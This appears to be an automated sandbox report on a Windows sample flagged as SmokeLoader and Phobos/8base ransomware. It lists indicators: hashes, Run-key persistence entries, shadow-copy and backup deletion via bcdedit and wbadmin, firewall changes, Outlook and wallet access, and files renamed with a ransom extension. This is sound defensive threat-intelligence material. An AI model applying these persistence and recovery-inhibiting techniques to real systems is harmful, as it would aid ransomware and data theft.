Malware Analysis Report

2024-11-16 12:15

Sample ID 230619-nljvraee91
Target 9769c181ecef69544bbb2f974b8c0e10.exe
SHA256 e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
Tags
smokeloader backdoor trojan phobos collection evasion persistence ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0

Threat Level: Known bad

The file 9769c181ecef69544bbb2f974b8c0e10.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader backdoor trojan phobos collection evasion persistence ransomware spyware stealer

SmokeLoader

Phobos

Modifies boot configuration data using bcdedit

Renames multiple (472) files with added filename extension

Deletes shadow copies

Downloads MZ/PE file

Deletes backup catalog

Blocklisted process makes network request

Modifies Windows Firewall

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Accesses Microsoft Outlook profiles

Drops desktop.ini file(s)

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Unsigned PE

Program crash

Uses Task Scheduler COM API

outlook_win_path

Suspicious behavior: MapViewOfSection

Modifies registry class

Checks SCSI registry key(s)

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Interacts with shadow copies

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-19 11:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-19 11:29

Reported

2023-06-19 11:31

Platform

win7-20230220-en

Max time kernel

150s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1356 set thread context of 1396 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

Network

N/A

Files

memory/1356-54-0x0000000000220000-0x0000000000235000-memory.dmp

memory/1396-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1396-56-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1356-57-0x0000000000250000-0x0000000000259000-memory.dmp

memory/1396-58-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1260-59-0x0000000002250000-0x0000000002266000-memory.dmp

memory/1396-60-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1260-64-0x000007FF63930000-0x000007FF6393A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-19 11:29

Reported

2023-06-19 11:31

Platform

win10v2004-20230220-en

Max time kernel

109s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

Signatures

Phobos

ransomware phobos

SmokeLoader

trojan backdoor smokeloader

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (472) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\CCBD.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rhyivhytef = "\"C:\\Users\\Admin\\AppData\\Roaming\\Rhyivhytef.exe\"" C:\Users\Admin\AppData\Local\Temp\C78B.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CCBD = "C:\\Users\\Admin\\AppData\\Local\\CCBD.exe" C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CCBD = "C:\\Users\\Admin\\AppData\\Local\\CCBD.exe" C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1529757233-3489015626-3409890339-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libequalizer_plugin.dll C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Styles.xbf C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmclienticon.exe.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\en\Microsoft.PackageManagement.ArchiverProviders.resources.dll C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\ui-strings.js.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main-selector.css.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\TipRes.dll.mui C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunec.jar C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODBC.DLL C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-16_contrast-white.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR\msipc.dll.mui.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-oob.xrm-ms.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected][18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_removeme-default_18.svg C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SplashScreen.scale-100.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\codec\libd3d11va_plugin.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\bootstrap.html C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
